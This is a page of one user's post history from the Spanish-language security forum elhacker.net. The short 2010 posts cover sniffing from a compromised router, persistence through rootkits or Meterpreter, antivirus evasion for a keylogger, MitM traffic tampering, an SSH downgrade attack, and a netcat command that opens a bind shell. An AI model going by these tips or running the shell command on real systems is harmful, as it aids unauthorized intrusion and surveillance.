elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9
41  Seguridad Informática / Hacking / Sniffar desde el router con BusyBox en: 24 Noviembre 2010, 21:40 pm
Hola,

Bueno, digamos que logro obtener acceso a un router con linux embebido (BusyBox) y quiero sniffear datos que van con SSL, como se hace ?, es decir, siempre he sniffeado desde otra computadora, no desde el router, me imagino que en este caso no debo utilizar el arpspoof porque todos los paquetes ya pasan por el router no?

en conclusion: Como se sniffea desde un router?

Salu2
42  Seguridad Informática / Hacking / Re: como tener acceso permanente a un equipo? Tengo acceso fisico a el unos dias en: 24 Noviembre 2010, 19:08 pm
Podes probar con un rootkit xD, aunque todos son detectados por antivirus.
Tambien podés instalar un servicio METERPRETER, que es mas jugoso que el cmd.exe de windows xD

Salu2
43  Seguridad Informática / Hacking Wireless / Re: antenna/router/tarjeta en: 8 Octubre 2010, 20:36 pm
openwrt no soporta el hardware..
Gracias de todos modos
44  Seguridad Informática / Hacking Wireless / antenna/router/tarjeta en: 8 Octubre 2010, 19:39 pm
hola !

hace poco me hice con una antenna KOZUMI http://www.kozumi-usa.com/new/products/WISP/AFO2v3.html que tiene un router y una tarjeta wi-fi integrada...
la duda es si hay alguna forma de usar estas cosas para wi-fi hacking...

segun lo que vi es dificil..


espero sus opinioones ...

Gracias
Salu2
45  Seguridad Informática / Análisis y Diseño de Malware / Re: Desarrollo un Keylogger y ya es detectado por Kaspersky!!! en: 8 Julio 2010, 23:35 pm
msfencode
46  Seguridad Informática / Hacking / Re: [Seguimiento] Caso de hacking practico en: 29 Junio 2010, 14:56 pm
mmm, remotamente es mas complicado, pero no imposible..

remotamente, te debes aferrar a las vulnerabilidades y a la ingenieria social aparte de hacer una buena recoleccion de informacion, etc..

el truco esta en saber combinar la info obtenida para hacer un buen verso y asi explotar una vulnerabilidad, ya sea externa o interna ;)

el error o ignorancia o impericia humanos, sirve mucho en estos casos...

salu2
47  Seguridad Informática / Hacking / Re: [Seguimiento] Caso de hacking practico en: 28 Junio 2010, 15:00 pm
lo que quiso decir plof es que el MitM no solo sirve para "ver" u observar / analizar el trafico que te llega, tambien puedes modificarlo a tu antojo !! ;) una forma facil seria a travez de ettercap usando filtros personalizados.

el modificar el trafico puede ser muy util, no solo puedes hacer el dns spoof (para explotar el navegador), sino que hay muchas posibilidades, solo tienes que darle lugar a la imaginacion...

un pequeño ejemplillo podria ser el modificar archivos que este descargando tu victima sistema auditado por alguno vulnerable... :silbar: pdf? jajja

Salu2
48  Seguridad Informática / Hacking / Re: (Arspoof + sshow + sshmitm) és possible robar una contrassenya SSH V2? en: 19 Mayo 2010, 04:46 am
No se puede sniffear user/pass de ssh v2.

Pero el mencionado Atack downgrade SSH V2 a V1 funciona.

Lo que se hace es agregar un filtro que cambia el paquete de respuesta del servidor para aparentar que solo admite conexiones de la version 1.

El cliente igualmente establece conexion mediante la version 1 del protocolo ssh, y ahi si lo puedes sniffear.
Lo malo de este ataque es que el cliente ssh le avisa al usuario que se esta realizando una conexion en la version 1, y si el usuario es avispado, va a revisar que pasa xD

Salu2.
49  Seguridad Informática / Hacking / Re: duda netcat en: 17 Mayo 2010, 23:50 pm
necesitas que haya una shell a la escucha.. puede ser mediante netcat u otro programa como un exploit xD

con netcat debes ejecutar esto en el otro equipo

Código:
nc -d -e cmd -p <PUERTO>

hay mucha info en el foro

Salu2
50  Seguridad Informática / Bugs y Exploits / Duda Buffer Overflow en: 15 Abril 2010, 05:32 am
Hola,

resulta que estoy auditando un programa en busqueda de buffer overflows,
este programa se pone a la escucha de comandos en un puerto determinado,
cuando a uno de esos comandos le paso como parametro mas de 2048 bytes el programa se cierra,
pero se cierra sin mostrar esa tipica ventana de enviar error...

en conclusion, el programa es explotable?

por que se cierra sin mostrar la ventana de error?

que se puede hacer para explotar un BoF?

me debo conformar solo con el DoS?

Gracias de antemano,

Salu2
Páginas: 1 2 3 4 [5] 6 7 8 9
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines